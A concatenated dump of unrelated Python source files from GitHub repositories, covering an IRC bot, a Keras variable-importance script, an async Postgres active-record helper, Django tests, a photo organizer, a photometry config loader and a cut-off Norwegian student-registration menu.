\"!\\r\\n\"\n clientSocket.send(bytes(response.decode('utf8').encode('utf8')))\n\n\n\n if message.str[0:5] == \"!song\" :\n response.str = webCrawler(message.str[6:len(message.str)])\n return True;\n # response.str = webCrawler()\n return False;\n\ndef messageParsing(message, nameToSend) :\n orgMessage = message.str\n delim = \"PRIVMSG bot :\"\n index = message.str.find(delim)\n if index == -1 :\n return 0\n index += len(delim)\n message.str = orgMessage[index:len(orgMessage)]\n while message.str[len(message.str)-1] == '\\n' or message.str[len(message.str)-1] == '\\r':\n message.str = message.str[0:len(message.str)-1]\n delim = \"!\"\n index = orgMessage.find(delim)\n nameToSend.str = orgMessage[1:index]\n return 1\ndef sendString(clientSocket, message) :\n nameToSend = Str()\n response = Str()\n statusNum = messageParsing(message, nameToSend)\n if statusNum == 0 :\n return\n isSendMessage = True;\n isSendMessage = messageQuery(message, response, clientSocket, nameToSend)\n if isSendMessage == False :\n return\n stringToSend = \"PRIVMSG \" + nameToSend.str + \" :\" + response.str + \"\\r\\n\"\n clientSocket.send(bytes(stringToSend.decode('utf8').encode('utf8')))\ndef main() :\n #lack gethostname\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n hostIp = \"127.0.0.1\"\n portNumber = 6667\n channelName = \"demo\"\n clientSocket.connect((hostIp, portNumber))\n signUpIRC(channelName, clientSocket)\n while True :\n msg = clientSocket.recv(4096).decode('utf8')\n message = Str()\n message.str = msg\n sendString(clientSocket, message)\n return\n\nmain()\n","repo_name":"aabb15768/2018_Computer_Network_HW01","sub_path":"irc.py","file_name":"irc.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21428316036","text":"import sys\nimport argparse\n\nif __name__ == \"__main__\":\n\n print(sys.argv)\n parser = argparse.ArgumentParser()\n\n parser.add_argument('items', metavar='N', type=str, nargs='+', help='items to show')\n parser.add_argument('-c', '--client_id', type=str, default='', help='input client_id if it has')\n\n args = vars(parser.parse_args())\n print(args['client_id'])\n print(args)\n\n #print(\"Hi there {}, it's nice to meet you!\".format(args[\"name\"]))\n","repo_name":"ErickRyu/PythonPlayground","sub_path":"start/simple_argument.py","file_name":"simple_argument.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73070028072","text":"import numpy as np\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nimport os\r\nimport datetime\r\nimport random\r\nimport tensorflow_addons as tfa\r\nimport keras\r\nimport copy\r\n\r\n#set wd\r\nos.chdir('C:/Users/Jackson DeBord/Documents/Spring_23/Learning/Project1')\r\n\r\n#load in model\r\n\r\n#respecify architecture\r\nmodel = keras.Sequential()\r\nmodel.add(keras.layers.Dense(units=36, name='input'))\r\nmodel.add(keras.layers.Dense(units=22, activation=\"sigmoid\", name = 'hidden1')) #reduce hidden layer by 40%\r\nmodel.add(keras.layers.Dense(units=14, activation=\"sigmoid\", name= 'hidden2')) #reduce hidden layer by 40%\r\nmodel.add(keras.layers.Dense(units=9, activation=\"sigmoid\", name= 'hidden3')) #reduce hidden layer by 40%\r\nmodel.add(keras.layers.Dense(units=1, activation=\"linear\", name= 'output')) #outputs 1 result\r\n\r\n\r\n#load in model\r\n#opt = keras.optimizers.Adam(learning_rate=0.01)\r\n#model.compile(loss='mean_squared_error', optimizer=opt, metrics=['mean_squared_error'])\r\n\r\nmodel.built = True\r\nmodel.load_weights('trained_weights_0.h5')\r\n\r\n\r\n#need to get dummies and divide by range\r\n\r\n#read in pricing\r\npricing = pd.read_csv('pricing.csv')\r\n\r\n#get ranges/min\r\n\r\nranges = pd.DataFrame({'range_quantity': [np.max(pricing['quantity']) - np.min(pricing['quantity'])],\r\n 'range_duration': [np.max(pricing['duration']) - np.min(pricing['duration'])],\r\n 'range_order': [np.max(pricing['order']) - np.min(pricing['order'])],\r\n 'range_price': [np.max(pricing['price']) - np.min(pricing['price'])],\r\n 'min_quantity': [np.min(pricing['quantity'])],\r\n 'min_duration': [np.min(pricing['duration'])],\r\n 'min_order': [np.min(pricing['order'])],\r\n 'min_price': [np.min(pricing['price'])]})\r\n\r\n\r\ndf_category = pd.read_csv('category_levels.csv').sort_values(by=[\"category_levels\"])\r\n\r\n#sets categories as 1 dimensional series\r\nsorted_columns = df_category[\"category_levels\"].values.tolist()\r\n\r\n#start with order\r\n\r\n#read in test pricing data\r\npricing = pd.read_csv('pricing_test.csv', names = ['sku','price','quantity',\r\n 'order', 'duration', 'category'])\r\n\r\n\r\n#drop sku\r\npricing = pricing.drop(['sku'], axis = 1)\r\n\r\n#scaling\r\npricing['quantity'] = (pricing['quantity'] - ranges['min_quantity'][0]) / ranges['range_quantity'][0]\r\npricing['duration'] = (pricing['duration'] - ranges['min_duration'][0]) / ranges['range_duration'][0]\r\npricing['order'] = (pricing['order'] - ranges['min_order'][0]) / ranges['range_order'][0]\r\npricing['price'] = (pricing['price'] - ranges['min_price'][0]) / ranges['range_price'][0]\r\n\r\n#saving actual y-values\r\ny_true = pricing['quantity'].to_numpy()\r\n\r\n#dropping quantity\r\npricing = pricing.drop(['quantity'],axis = 1)\r\n\r\n\r\n\r\n#changing to categorical data types\r\ncategory_types = pd.CategoricalDtype(categories = sorted(df_category['category_levels'][:]), ordered = True)\r\n#create dummies\r\npricing['category'] = pricing['category'].astype(category_types)\r\n\r\n\r\npricing = pd.get_dummies(pricing, ['category'])\r\n\r\n\r\n#save unaltered data to numpy array\r\nX_normal = pricing.to_numpy()\r\n\r\n#permute variable of interest\r\npricing['order'] = np.random.permutation(pricing['order'])\r\n\r\n#save as numpy array\r\nX_permute = pricing.to_numpy()\r\n\r\n\r\n#predict for reg data\r\ny_hat_normal = model.predict(X_normal)\r\n\r\n#predict for permuted data\r\ny_hat_permute = model.predict(X_permute)\r\n\r\n#calculate correlation for each\r\nr_normal = np.corrcoef(y_true, y_hat_normal.flatten())\r\nr_permute = np.corrcoef(y_true, y_hat_permute.flatten())\r\n\r\n#find difference (vi)\r\nvi_order = r_normal[0,1] - r_permute[0,1]\r\nvi_order\r\n\r\n\r\n#duration\r\npricing = pd.read_csv('pricing_test.csv', names = ['sku','price','quantity',\r\n 'order', 'duration', 'category'])\r\n\r\n\r\n#drop sku\r\npricing = pricing.drop(['sku'], axis = 1)\r\n\r\n#scale\r\npricing['quantity'] = (pricing['quantity'] - ranges['min_quantity'][0]) / ranges['range_quantity'][0]\r\npricing['duration'] = (pricing['duration'] - ranges['min_duration'][0]) / ranges['range_duration'][0]\r\npricing['order'] = (pricing['order'] - ranges['min_order'][0]) / ranges['range_order'][0]\r\npricing['price'] = (pricing['price'] - ranges['min_price'][0]) / ranges['range_price'][0]\r\n\r\n#save y values and drop from df\r\ny_true = pricing['quantity'].to_numpy()\r\n\r\npricing = pricing.drop(['quantity'],axis = 1)\r\n\r\n\r\n\r\n#create dummies\r\ncategory_types = pd.CategoricalDtype(categories = sorted(df_category['category_levels'][:]), ordered = True)\r\npricing['category'] = pricing['category'].astype(category_types)\r\n\r\n\r\npricing = pd.get_dummies(pricing, ['category'])\r\n\r\n#save unaltered data\r\nX_normal = pricing.to_numpy()\r\n\r\n#permute duration\r\npricing['duration'] = np.random.permutation(pricing['duration'])\r\n\r\nX_permute = pricing.to_numpy()\r\n\r\n#predict from permuted data\r\n\r\ny_hat_normal = model.predict(X_normal)\r\n\r\ny_hat_permute = model.predict(X_permute)\r\n\r\nr_normal = np.corrcoef(y_true, y_hat_normal.flatten())\r\nr_permute = np.corrcoef(y_true, y_hat_permute.flatten())\r\n\r\n#calculate vi\r\nvi_duration = r_normal[0,1] - r_permute[0,1]\r\nvi_duration\r\n\r\n\r\n\r\n#price\r\npricing = pd.read_csv('pricing_test.csv', names = ['sku','price','quantity',\r\n 'order', 'duration', 'category'])\r\n\r\n\r\n\r\npricing = pricing.drop(['sku'], axis = 1)\r\n\r\n#scale\r\npricing['quantity'] = (pricing['quantity'] - ranges['min_quantity'][0]) / ranges['range_quantity'][0]\r\npricing['duration'] = (pricing['duration'] - ranges['min_duration'][0]) / ranges['range_duration'][0]\r\npricing['order'] = (pricing['order'] - ranges['min_order'][0]) / ranges['range_order'][0]\r\npricing['price'] = (pricing['price'] - ranges['min_price'][0]) / ranges['range_price'][0]\r\n\r\n\r\ny_true = pricing['quantity'].to_numpy()\r\n\r\npricing = pricing.drop(['quantity'],axis = 1)\r\n\r\n\r\n\r\n\r\ncategory_types = pd.CategoricalDtype(categories = sorted(df_category['category_levels'][:]), ordered = True)\r\npricing['category'] = pricing['category'].astype(category_types)\r\n\r\n\r\npricing = pd.get_dummies(pricing, ['category'])\r\n\r\nX_normal = pricing.to_numpy()\r\n\r\n\r\npricing['price'] = np.random.permutation(pricing['price'])\r\n\r\nX_permute = pricing.to_numpy()\r\n\r\n\r\n#fit predictions\r\ny_hat_normal = model.predict(X_normal)\r\n\r\ny_hat_permute = model.predict(X_permute)\r\n\r\nr_normal = np.corrcoef(y_true, y_hat_normal.flatten())\r\nr_permute = np.corrcoef(y_true, y_hat_permute.flatten())\r\n\r\n#calculate vi\r\nvi_price = r_normal[0,1] - r_permute[0,1]\r\nvi_price\r\n\r\n#category\r\npricing = pd.read_csv('pricing_test.csv', names = ['sku','price','quantity',\r\n 'order', 'duration', 'category'])\r\n\r\n\r\n\r\npricing = pricing.drop(['sku'], axis = 1)\r\n\r\n\r\npricing['quantity'] = (pricing['quantity'] - ranges['min_quantity'][0]) / ranges['range_quantity'][0]\r\npricing['duration'] = (pricing['duration'] - ranges['min_duration'][0]) / ranges['range_duration'][0]\r\npricing['order'] = (pricing['order'] - ranges['min_order'][0]) / ranges['range_order'][0]\r\npricing['price'] = (pricing['price'] - ranges['min_price'][0]) / ranges['range_price'][0]\r\n\r\n\r\ny_true = pricing['quantity'].to_numpy()\r\n\r\npricing = pricing.drop(['quantity'],axis = 1)\r\n\r\n\r\n\r\n\r\ncategory_types = pd.CategoricalDtype(categories = sorted(df_category['category_levels'][:]), ordered = True)\r\npricing_normal = copy.copy(pricing)\r\n\r\npricing_normal['category'] = pricing_normal['category'].astype(category_types)\r\n\r\n\r\npricing_normal = pd.get_dummies(pricing_normal, ['category'])\r\n\r\nX_normal = pricing_normal.to_numpy()\r\n\r\npricing_permute = copy.copy(pricing)\r\n\r\npricing_permute['category'] = np.random.permutation(pricing_permute['category'])\r\npricing_permute['category'] = pricing_permute['category'].astype(category_types)\r\n\r\n\r\npricing_permute = pd.get_dummies(pricing_permute, ['category'])\r\n\r\nX_permute = pricing_permute.to_numpy()\r\n\r\n\r\n\r\ny_hat_normal = model.predict(X_normal)\r\n\r\ny_hat_permute = model.predict(X_permute)\r\n\r\nr_normal = np.corrcoef(y_true, y_hat_normal.flatten())\r\nr_permute = np.corrcoef(y_true, y_hat_permute.flatten())\r\n\r\n\r\nvi_category = r_normal[0,1] - r_permute[0,1]\r\nvi_category\r\n\r\nvi = [vi_duration, vi_price, vi_category, vi_order]\r\n\r\nvi\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.bar(x = ['duration', 'price', 'category', 'order'],\r\n height = vi)\r\n\r\nplt.title('Variable Importance Measures for Each Variable')\r\nplt.xlabel('Variable')\r\nplt.ylabel('Importance')\r\nplt.show()\r\n","repo_name":"LHu13/BZAN554.1","sub_path":"viplots.py","file_name":"viplots.py","file_ext":"py","file_size_in_byte":8525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34252898926","text":"\nfrom tornado import gen\nfrom database import DatabaseMixin\n\n\ndef yieldme(fn):\n def wrapper(*args, **kwargs):\n return gen.Task(fn, *args, **kwargs)\n return wrapper\n\n\nclass PGActiveRecord(dict, DatabaseMixin):\n table_name = ''\n primary_key = 'id'\n\n def data_callback_fetch(self, c, e, callback):\n if e:\n raise e\n\n row = self.fetch_row(c)\n if row:\n for k, v in row.iteritems():\n self[k] = v\n callback(self)\n else:\n callback(None)\n\n def data_callback_modify(self, c, e, callback):\n \"\"\"After insert return inserted id or count query\"\"\"\n if e:\n raise e\n\n if c.description:\n row = c.fetchone()\n callback(row[0])\n else:\n callback(None)\n\n def _impl_insert(self, callback):\n f = []\n v = []\n values = []\n for k in self.keys():\n f.append(k)\n v.append('%s')\n values.append(self[k])\n\n sql = 'INSERT INTO %s (%s) VALUES (%s) RETURNING %s' % (\n self.table_name,\n ', '.join(f),\n ', '.join(v),\n self.primary_key\n )\n self.db.execute(sql, values, callback=lambda x, e: self.data_callback_modify(x, e, callback))\n\n def _impl_update(self, callback):\n pairs = []\n values = []\n for k in self.keys():\n pairs.append('%s = %%s' % k)\n values.append(self[k])\n values.append(self[self.primary_key])\n\n sql = 'UPDATE %s SET %s WHERE %s = %%s' % (self.table_name, ', '.join(pairs), self.primary_key)\n self.db.execute(sql, values, callback=lambda x, e: self.data_callback_modify(x, e, callback))\n\n @classmethod\n @yieldme\n def fetch(cls, _id, **kwargs):\n callback = kwargs.pop('callback')\n _self = cls()\n _self.db.execute(\n 'SELECT * FROM %s WHERE id = %%s' % _self.table_name, [_id],\n callback=lambda x, e: _self.data_callback_fetch(x, e, callback)\n )\n\n @classmethod\n @yieldme\n def find_one(cls, condition, condvars=[], **kwargs):\n callback = kwargs.pop('callback')\n _self = cls()\n _self.db.execute(\n 'SELECT * FROM %s WHERE %s LIMIT 1' % (_self.table_name, condition), condvars,\n callback=lambda x, e: _self.data_callback_fetch(x, e, callback)\n )\n\n @yieldme\n def save(self, **kwargs):\n callback = kwargs.pop('callback')\n\n if self.primary_key in self.keys() and self[self.primary_key]:\n self._impl_update(callback)\n else:\n self._impl_insert(callback)\n\n @yieldme\n def pg_insert(self, **kwargs):\n callback = kwargs.pop('callback')\n self._impl_insert(callback)\n\n @yieldme\n def pg_update(self, **kwargs):\n callback = kwargs.pop('callback')\n self._impl_update(callback)\n\n @yieldme\n def pg_delete(self, _id, **kwargs):\n callback = kwargs.pop('callback')\n sql = 'DELETE FROM %s WHERE %s = %%s' % (self.table_name, self.primary_key)\n self.db.execute(sql, [_id], callback=lambda x, e: self.data_callback_modify(x, e, callback))\n\n @classmethod\n @yieldme\n def pg_del_condition(cls, condition=None, condvars=[], **kwargs):\n callback = kwargs.pop('callback')\n sql = 'DELETE FROM %s' % cls.table_name\n if condition:\n sql = sql + ' WHERE ' + condition\n _self = cls()\n _self.db.execute(sql, condvars, callback=lambda x, e: _self.data_callback_modify(x, e, callback))\n\n @classmethod\n @yieldme\n def pg_rows_count(cls, condition=None, condvars=[], **kwargs):\n callback = kwargs.pop('callback')\n sql = 'SELECT COUNT(*) FROM %s' % cls.table_name\n if condition:\n sql = sql + ' WHERE ' + condition\n _self = cls()\n _self.db.execute(sql, condvars, callback=lambda x, e: _self.data_callback_modify(x, e, callback))\n\n\nclass PGRowset(list, DatabaseMixin):\n\n def __init__(self, table, **kwargs):\n self.table_name = table\n self._fields = kwargs.get('fields', ['*'])\n self._maxitems = kwargs.get('maxitems')\n self._offset = kwargs.get('offset', 0)\n self._condition = kwargs.get('condition', '')\n self._condvars = kwargs.get('condvars', [])\n self._orderby = kwargs.get('orderby', '')\n\n def set(self, **kwargs):\n k = kwargs.keys()\n if 'fields' in k:\n self._fields = kwargs['fields']\n if 'maxitems' in k:\n self._maxitems = kwargs['maxitems']\n if 'offset' in k:\n self._offset = kwargs['offset']\n if 'condition' in k:\n self._condition = kwargs['condition']\n if 'condvars' in k:\n self._condvars = kwargs['condvars']\n if 'orderby' in k:\n self._orderby = kwargs['orderby']\n\n @yieldme\n def pg_load(self, **kw):\n callback = kw.pop('callback')\n sql = ['SELECT', ', '.join(self._fields), 'FROM', self.table_name]\n\n if len(self._condition) > 0:\n sql.append('WHERE')\n sql.append(self._condition)\n\n if len(self._orderby) > 0:\n sql.append('ORDER BY')\n sql.append(self._orderby)\n\n if self._maxitems:\n sql.append('LIMIT')\n sql.append(str(self._maxitems))\n\n if self._offset:\n sql.append('OFFSET')\n sql.append(str(self._offset))\n self.db.execute(' '.join(sql), self._condvars, callback=lambda x, e: self.data_callback_load(x, e, callback))\n\n def data_callback_load(self, c, e, callback):\n if e:\n raise e\n\n colms = [d[0] for d in c.description]\n\n r = c.fetchone()\n while r:\n row = {}\n for i, column in enumerate(colms):\n try_decode = lambda _v: _v.decode('utf-8') if isinstance(_v, str) else _v\n\n if isinstance(r[i], list):\n row[column] = []\n for x in r[i]:\n row[column].append(try_decode(x))\n else:\n row[column] = try_decode(r[i])\n\n self.append(row)\n r = c.fetchone()\n\n callback(self)\n","repo_name":"rinatous/pg-async-crud","sub_path":"pgar.py","file_name":"pgar.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15622989194","text":"from django.db import models\nfrom django.db import IntegrityError\n\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom django.test import TestCase\n\nfrom nose import tools as nt\n\nfrom domande.models import TextQuestion, ChoiceQuestion, Choice\nfrom domande.models import TextAnswer, ChoiceAnswer\nfrom domande.models import Question\n\nfrom .models import DummyModel, DummyMember\n\nfrom .utils import BaseTest\n\n\nclass DomandeModelTests(BaseTest):\n\n def test_text_questions(self):\n '''Create a bunch of text questions'''\n\n question_texts = [\n 'How much wood can a woodchuck chuck?',\n 'What is the meaning of life'\n ]\n\n for i, text in enumerate(question_texts):\n t = TextQuestion.objects.create(order=i,\n text=text)\n self.dummy.questions.add(t)\n\n sorted([question.text for question in self.dummy.questions.all()])\n\n questions = self.dummy.questions.all()\n nt.eq_(questions.count(), 2)\n\n\nclass DemoCompQuestion(BaseTest):\n\n def test_road_week8(self):\n ''' Test the db structure by using some sample data'''\n\n choice_label_text = [\n 'Certified dolphin-safe',\n 'Cooked to perfection',\n 'High in quality protein',\n 'Delicous',\n 'Responsibly caught by the pole & line',\n 'Greenpeace endorsed fishing-practices',\n 'Natural source of omega-3s',\n 'All of the above!'\n ]\n\n choices = [Choice.objects.create(order=i, label=label)\\\n for i, label in enumerate(choice_label_text)]\n\n choice_question = ChoiceQuestion.objects.create(multichoice=True,\n text=\"Why do we love safcol tuna?\")\n\n self.dummy.questions.add(choice_question)\n\n choice_question.choices = choices\n choice = choice_question.choices.filter(label__icontains='protein')\n nt.eq_(choice.count(), 1)\n nt.eq_(choice.all()[0].order, 2)\n\n text_question = TextQuestion.objects.create(order=1,\n text='How much wood can a woodchuck chuck?')\n\n self.dummy.questions.add(text_question)\n\n # we created two questions so we should get 2 back\n nt.eq_(self.dummy.questions.all().count(), 2)\n\n\nclass TestAnswerModels(BaseTest):\n\n def test_text_answer(self):\n '''\n Test that the reverse GenericRelation works\n '''\n\n text_question = TextQuestion.objects.create(order=1,\n text='How much wood can a woodchuck chuck?')\n\n for i in range(2):\n # answer belongs to member\n answer = TextAnswer.objects.create(\n question=text_question,\n answer=\"4%d woods\" %i,\n content_object=self.member,\n )\n\n nt.eq_(self.member.answers.count(), 2)\n\n # Test that we can get the answer object\n nt.eq_(self.member.answers.all()[1], answer)\n\n # Test the we can get the question from answer\n nt.eq_(self.member.answers.all()[1].question, text_question)\n\n\n def test_choice_answer(self):\n '''\n Test Choice answers\n '''\n\n choices = [Choice.objects.create(label=t) for t in ('42', '43', '45')]\n\n choice_question = ChoiceQuestion.objects.create(\n text='What is the meaning of life?'\n )\n\n choice_question.choices = choices\n\n choice_answer = ChoiceAnswer.objects.create(\n question=choice_question,\n content_object=self.member,\n )\n\n choice_answer.answer = choices[:2]\n\n # Test that we can get the answer object\n nt.eq_(self.member.answers.count(), 1)\n\n # Test that we can find same Choices that was 'selected'\n nt.eq_(set(choices[:2]), set(self.member.answers.all()[0].answer.all()))\n\n # The second member shouldnt have any answers\n nt.eq_(self.member2.answers.count(), 0)\n\n\ndef test_question_unicode():\n q = Question.objects.create(text='lol')\n nt.eq_(unicode(q), 'lol')\n","repo_name":"bulkan/django-domande","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"9464038009","text":"import os\r\nfrom datetime import datetime\r\nfrom PIL import Image\r\nimport shutil\r\n\r\ndef pasta_para_fotos(file):\r\n data = data_foto_tirada(file)\r\n return data.strftime(f'%Y/{data.strftime(\"%Y-%m-%d\")}')\r\n\r\ndef data_foto_tirada(file):\r\n foto = Image.open(file)\r\n info = foto._getexif()\r\n if 36867 in info:\r\n data = info[36867]\r\n data = datetime.strptime(data, '%Y:%m:%d %H:%M:%S')\r\n else:\r\n data = datetime.fromtimestamp(os.path.getmtime(file))\r\n return data\r\n\r\ndef mover_fotos(file):\r\n novaPasta = pasta_para_fotos(file)\r\n if not os.path.exists(novaPasta):\r\n os.makedirs(novaPasta)\r\n shutil.move(file, novaPasta + '/' + file)\r\n\r\nprint(mover_fotos('foto_exemplo.jpg'))\r\n","repo_name":"jeffsouza01/Projeto_OrganizadorDeFotos","sub_path":"organiza_fotos.py","file_name":"organiza_fotos.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19464064584","text":"import argparse\nimport json\nimport os\n\nimport astropandas as apd\nimport numpy as np\nimport pandas as pd\n\nfrom . import Keys\nfrom .logger import logger\n\n\nerror_suffix = \"_err\"\n\n\nclass DumpAction(argparse.Action):\n\n def __call__(self, parser, namespace, values, option_string=None):\n default = json.dumps({\n \"filter_name (e.g. 'r')\": {\n \"outname\": \"# output column name (suffix appended for \"\n f\"errors: {error_suffix})\",\n \"flux\": \"# name of colum with flux\",\n \"error\": \"# name of column with flux error\",\n \"magnitude\": \"# name of column with magnitudes (value ignored \"\n \"if --zeropoint is given)\",\n }\n }, indent=4)\n print(default)\n parser.exit()\n\n\nclass LoadConfig:\n\n def __init__(self, args):\n self.verbose = args.verbose\n # get the commandline arguments\n self.infile = args.infile\n self.hdu = args.hdu\n self.outfile = args.outfile\n self.fields = args.fields\n # read the configuration file\n logger.info(f\"reading configuration from {args.config}\")\n with open(args.config) as f:\n data = json.load(f)\n self.filters = list(data.keys())\n self.outname = {\n fname: config[\"outname\"] for fname, config in data.items()}\n self.flux = {\n fname: config[\"flux\"] for fname, config in data.items()}\n self.error = {\n fname: config[\"error\"] for fname, config in data.items()}\n self.magnitude = {\n fname: config[\"magnitude\"] for fname, config in data.items()}\n self._config = data # store for later use\n self.zeropoint = None # default, overwritten by subclasses\n\n def get(self, filter_name, key):\n return self._config[filter_name][key]\n\n def set(self, filter_name, key, value):\n self._config[filter_name][key] = value\n\n def load_input(self):\n logger.info(f\"reading data from {self.infile}\")\n try:\n return apd.read_auto(self.infile, hdu=self.hdu)\n except TypeError:\n return apd.read_auto(self.infile)\n\n def get_fields(self, df):\n try:\n if self.fields is None:\n return np.zeros(len(df), dtype=np.float)\n else:\n return df[self.fields].to_numpy()\n except KeyError as e:\n raise KeyError(f\"fields column {e} not found\")\n\n def get_fluxes(self, df):\n try:\n return {key: df[val] for key, val in self.flux.items()}\n except KeyError as e:\n raise KeyError(f\"flux column {e} not found\")\n\n def get_errors(self, df):\n try:\n return {key: df[val] for key, val in self.error.items()}\n except KeyError as e:\n raise KeyError(f\"flux error column {e} not found\")\n\n def get_magnitudes(self, df):\n try:\n if self.zeropoint is None:\n return {key: df[val] for key, val in self.magnitude.items()}\n else:\n return None\n except KeyError as e:\n raise KeyError(f\"magnitude column {e} not found\")\n\n def verify_filters(self, df_with_filter_col):\n df_filters = set(\n df_with_filter_col.index.get_level_values(Keys.filter).unique())\n conf_filters = set(self.filters)\n if df_filters != conf_filters:\n message = \"filter set does not match the configuration file\"\n logger.error(message)\n raise ValueError(message)\n\n\nclass LoadConfigSmooting(LoadConfig):\n\n def __init__(self, args):\n super().__init__(args)\n # check the additional commandline arguments\n self.zeropoint = args.zeropoint\n if self.zeropoint is not None:\n self.magnitude = None\n self.adapt = args.adapt\n self.suffix = args.suffix\n self.adapt_file = args.adapt_file\n\n def KiDS_aware_colname(self, flux_col_name):\n if \"GAAP\" in flux_col_name:\n colname = flux_col_name.replace(\"GAAP\", \"GAAPadapt\")\n else:\n colname = flux_col_name + self.suffix\n return colname\n\n def add_column_and_update(self, data, values, filt, which):\n key = self.KiDS_aware_colname(self.get(filt, which))\n logger.info(f\"adding {which} column: {key}\")\n data[key] = values.astype(np.float32) # default 64 bit is overkill\n self.set(filt, which, key)\n\n def load_adapt(self):\n if self.adapt is not None:\n logger.info(f\"reading external statistics from {self.adapt}\")\n data = pd.read_csv(self.adapt, index_col=[Keys.filter, Keys.field])\n self.verify_filters(data)\n return data\n else:\n return None\n\n def write_output(self, data):\n if self.adapt_file is None:\n fpath = \"_adapted\".join(os.path.splitext(self.infile))\n else:\n fpath = self.adapt_file\n logger.info(f\"writing adapted table data to {fpath}\")\n apd.to_auto(data, fpath)\n\n def write_stats(self, data):\n logger.info(f\"writing statistics to {self.outfile}\")\n data.to_csv(self.outfile)\n\n\nclass LoadConfigMagnitudes(LoadConfig):\n\n def __init__(self, args):\n super().__init__(args)\n # check the additional commandline arguments\n self.stats = args.stats\n self.smoothing = args.smoothing\n self.b_global = args.b_global\n self.plot = args.plot\n\n def load_stats(self):\n logger.info(f\"reading statistics from {self.stats}\")\n data = pd.read_csv(self.stats, index_col=[Keys.filter, Keys.field])\n self.verify_filters(data)\n return data\n\n def load_smoothing(self):\n fpath = self.smoothing if self.smoothing is not None else self.stats\n logger.info(f\"reading statistics from {fpath}\")\n data = pd.read_csv(fpath, index_col=[Keys.filter, Keys.field])\n self.verify_filters(data)\n return data\n\n @staticmethod\n def KiDS_aware_error_colname(mag_col_name):\n if mag_col_name.startswith(\"HMAG_\"):\n error_colname = f\"HMAGERR_{mag_col_name[5:]}\"\n else:\n error_colname = mag_col_name + error_suffix\n return error_colname\n\n def write_output(self, data):\n logger.info(f\"writing table data to {self.outfile}\")\n apd.to_auto(data, self.outfile)\n","repo_name":"jlvdb/hyperbolic","sub_path":"hyperbolic/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":6450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16327185467","text":"# Trenger for \"fjerne og endre\" funksjonene\r\nimport os\r\n\r\ngyldigMenyvalg = [1, 2, 3, 4, 5]\r\nharValgt = False\r\nstudentFil = \"Student13.txt\"\r\nemneFil = \"Emne13.txt\"\r\nresultatFil = \"Eksamensresultat13.txt\"\r\nstudenter = []\r\nstudentInfo = []\r\nfinnes = False\r\nbrukerValg = input(\"Meny\\n1. Registrering\\n2. Sletting\\n3. Skriv ut karakterliste for student\\n4. Skriv ut sensurliste for emne\\n5. Avslutt\\n\\n\")\r\nharValgt = False\r\nforsteGang = True\r\nslett = False\r\n\r\nregStudent = False\r\nregEmne = False\r\nregResultat = False\r\n\r\nfinnStudent = \"finnStudent\"\r\nfinnEmne = \"finnEmne\"\r\nfinnResultat = \"finnResultat\"\r\n\r\n# Registrer student\r\nstudNummer = 0\r\nstudFornavn = \"\"\r\nstudEtternavn = \"\"\r\nstudStudium = \"\"\r\n\r\n# Registrer emne\r\nemneKode = 0\r\nemneNavn = \"\"\r\n\r\n# Registrer eksamensresultat\r\nregEksamensresultatMeny = [\"\\n1. Registrer emnekode\", \"\\n2. Registrer studentnummer\", \"\\n3. Registrer karakter\"]\r\neksEmneKode = 0\r\neksStudNummer = 0\r\neksKarakter = \"\"\r\n\r\n\r\ndef valgMeny():\r\n global brukerValg\r\n global harValgt\r\n global regStudent\r\n global regEmne\r\n global regResultat\r\n global finnStudent\r\n global finnEmne\r\n global finnResultat\r\n global slett\r\n\r\n if (brukerValg == 1):\r\n harValgt = False\r\n gyldigMenyvalg = [1, 2, 3]\r\n \r\n while not (harValgt):\r\n registreringsValg = int(input(\"\\n1. Registrer student\\n2. Registrer emne\\n3. Registrer resultat\\n\\n\"))\r\n brukerValg = int(registreringsValg)\r\n for i in gyldigMenyvalg:\r\n if (i == brukerValg):\r\n harValgt = True\r\n \r\n if (brukerValg == 1): #Registrer student\r\n studNummer = int(input(\"\\n1. Registrer studentnummer\\n\"))\r\n studFornavn = input(\"\\n2. Registrer fornavn\\n\")\r\n studEtternavn = input(\"\\n3. Registrer etternavn\\n\")\r\n studStudium = input(\"\\n4. Registrer studium\\n\")\r\n studentInfo = [studNummer, studFornavn, studEtternavn, studStudium]\r\n regEmne = False\r\n regResultat = False\r\n regStudent = True\r\n objektInfo = [finnStudent, studNummer]\r\n if (not finnesFraFor(objektInfo)):\r\n registrer(studentInfo)\r\n skrivMeny()\r\n else:\r\n print(\"\\n\\nStudenten finnes fra før. Kunne derfor ikke registrere data.\")\r\n skrivMeny()\r\n elif(brukerValg == 2): #Registrer emne\r\n emneKode = int(input(\"\\n1. Registrer emnekode\\n\"))\r\n emneNavn = input(\"\\n2. Registrer emnenavn\\n\")\r\n emneInfo = [emneKode, emneNavn]\r\n regResultat = False\r\n regStudent = False\r\n regEmne = True\r\n objektInfo = [finnEmne, emneKode]\r\n if (not finnesFraFor(objektInfo)):\r\n registrer(emneInfo)\r\n skrivMeny()\r\n else:\r\n print(\"\\n\\nEmne finnes fra før. Kunne derfor ikke registrere data.\")\r\n skrivMeny()\r\n elif(brukerValg == 3): #Registrer resultat\r\n emneKode = int(input(\"\\n1. Registrer emnekode\\n\"))\r\n studentNummer = int(input(\"\\n2. Registrer studentnummer\\n\"))\r\n karakter = input(\"\\n3. Registrer karakter\\n\")\r\n resultatInfo = [emneKode, studentNummer, karakter]\r\n regEmne = False\r\n regStudent = False\r\n regResultat = True\r\n slett = False\r\n 